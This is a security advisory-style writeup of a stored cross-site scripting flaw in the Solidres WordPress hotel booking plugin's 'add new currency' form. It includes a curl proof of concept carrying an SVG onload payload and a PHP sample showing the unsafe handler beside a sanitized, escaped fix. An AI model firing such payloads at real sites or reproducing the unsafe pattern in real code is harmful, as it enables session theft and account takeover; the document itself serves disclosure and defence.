CVE-2023-1374 - Solidres <= 0.9.4 - Authenticated (Admin+) Stored Cross-Site Scripting
Solidres – Hotel Booking Plugin for WordPress version 0.9.4 has been found to have a POST-based cross-site scripting (XSS) vulnerability in the "add new currency" feature of the plugin.

Introduction
Cross-Site Scripting (XSS) is a type of security vulnerability that allows attackers to inject malicious code into web pages viewed by other users. The vulnerability can be exploited by attackers to steal user data, take over user accounts, and launch other malicious attacks. In this technical writeup, we will discuss a POST-based XSS vulnerability that was discovered in the Solidres – Hotel booking plugin for WordPress version 0.9.4.
Description
The Solidres – Hotel booking plugin for WordPress version 0.9.4 is vulnerable to a POST-based XSS vulnerability in the "add new currency" feature of the plugin. An authenticated user with administrator-level access (as the CVE title states) can inject malicious code through the currency_name parameter of the POST request. The currency_name parameter is not properly sanitized before being used in the plugin's code, so the injected value is stored with the currency record and emitted into the plugin's output unchanged.
Proof of Concept
curl 'http://example.com/wp-admin/admin.php?page=sr-add-new-currency' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
-H 'Accept-Language: en-GB,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Referer: http://example.com/wp-admin/admin.php?page=sr-add-new-currency' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://example.com' \
-H 'Connection: keep-alive' \
-H 'Cookie: <redacted>' \
-H 'Upgrade-Insecure-Requests: 1' \
--data-raw 'srform%5Bcurrency_name%5D=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSS%2F%29%3E&srform%5Bcurrency_code%5D=123&srform%5Bsign%5D=123&srform%5Bexchange_rate%5D=123&srform%5Bstate%5D=1&srform%5Bfilter_range%5D=&save_currency=Save'
The above POST data contains a malicious SVG tag injected into the currency_name parameter. When the plugin processes the POST request, it includes the SVG tag in the output without properly sanitizing it. As a result, the SVG element's onload handler executes in the browser of any user who views that page, which triggers a prompt box with the message "XSS".
Impact
This vulnerability can be exploited by an attacker to steal user data, take over user accounts, and launch other malicious attacks. For example, an attacker can inject a script that steals the user's session cookie, which can be used to take over the user's account. The attacker can also inject a script that redirects the user to a malicious website, which can be used to download malware onto the user's computer.
Solution
To fix the vulnerability, the currency_name parameter of the POST request should be properly sanitized before it is stored and escaped for its output context when it is rendered back into the admin page. The plugin developers should also implement a Content Security Policy (CSP) to mitigate the impact of any potential XSS attacks. The plugin developers should release a patch as soon as possible to address the vulnerability.
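The following PHP illustrates both the unsafe pattern described in the Description section and the fix outlined above, using the standard WordPress sanitization and escaping APIs. It is an added example written for this writeup, not code from the Solidres plugin; the function names (example_save_currency_unsafe, example_save_currency_hardened), the nonce action name and the CSP policy are hypothetical. The few stand-in definitions at the top exist only so the file also runs under a plain php CLI outside WordPress, where the real functions are defined.

```php
<?php
// Added illustration (not Solidres code): the unsafe pattern that produces the
// stored XSS described above, next to a hardened handler that sanitizes the
// currency_name field on input and escapes it on output via WordPress APIs.
// Function, action and option names in this file are hypothetical.

// Simplified stand-ins so the file also runs under plain `php` outside WordPress.
// Inside WordPress these functions already exist and the real ones are used.
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) { return trim( strip_tags( (string) $str ) ); }
    function esc_html( $text ) { return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' ); }
    function esc_attr( $text ) { return esc_html( $text ); }
    function wp_unslash( $value ) { return is_string( $value ) ? stripslashes( $value ) : $value; }
}

// UNSAFE: the value is taken from the POST body unfiltered and echoed back into
// the admin page as-is, so "><svg/onload=...> lands in the markup intact.
function example_save_currency_unsafe( array $post ) {
    $name = $post['srform']['currency_name'] ?? '';
    return '<input type="text" name="srform[currency_name]" value="' . $name . '">'
         . '<td>' . $name . '</td>';
}

// HARDENED: sanitize on input, escape on output for the right context.
function example_save_currency_hardened( array $post ) {
    // 1. Input: a currency name is plain text, so strip tags, control characters
    //    and excess whitespace before it is stored. wp_unslash() first, because
    //    WordPress adds slashes to $_POST.
    $name = sanitize_text_field( wp_unslash( $post['srform']['currency_name'] ?? '' ) );

    // 2. Output: escape for the context the value is rendered into. esc_attr()
    //    inside attribute values, esc_html() for element text; never raw.
    return '<input type="text" name="srform[currency_name]" value="' . esc_attr( $name ) . '">'
         . '<td>' . esc_html( $name ) . '</td>';
}

// Inside WordPress the save handler should additionally be guarded before the
// record is written (hypothetical nonce action name):
//   if ( ! current_user_can( 'manage_options' ) ) { wp_die( 'Forbidden' ); }
//   check_admin_referer( 'sr_save_currency' ); // pairs with wp_nonce_field() in the form

// Defence in depth: a CSP without 'unsafe-inline' blocks inline event handlers
// such as onload= even if an escaping bug slips through. wp-admin itself relies
// on inline scripts, so a real policy must be tuned and tested per site.
if ( function_exists( 'add_action' ) ) {
    add_action( 'send_headers', function () {
        header( "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'" );
    } );
}

// Demo with the payload from the PoC above (constructed request body).
$poc = array( 'srform' => array( 'currency_name' => '"><svg/onload=prompt(/XSS/)>' ) );
echo "UNSAFE:   " . example_save_currency_unsafe( $poc ) . PHP_EOL;
echo "HARDENED: " . example_save_currency_hardened( $poc ) . PHP_EOL;
```

Run with `php example.php`: the unsafe output contains the literal `<svg/onload=...>` markup, while the hardened output has the tag stripped and the remaining quote and angle bracket rendered as `&quot;&gt;`, so nothing executes. Sanitizing input alone is not enough; the output escaping is what makes the rendered page safe regardless of how the value reached the database.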
Conclusion
The POST-based XSS vulnerability in the Solidres – Hotel booking plugin for WordPress version 0.9.4 can be exploited by an attacker to steal user data, take over user accounts, and launch other malicious attacks. The vulnerability exists in the "add new currency" feature of the plugin, and can be exploited by injecting a malicious SVG tag into the currency_name parameter of the POST request. To mitigate the vulnerability, the plugin developers should properly sanitize the currency_name parameter and implement a Content Security Policy (CSP). Users of the plugin should update to the latest version as soon as a patch is released.
References
- https://www.cve.org/CVERecord?id=CVE-2023-1374
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/solidres/solidres-094-authenticated-admin-stored-cross-site-scripting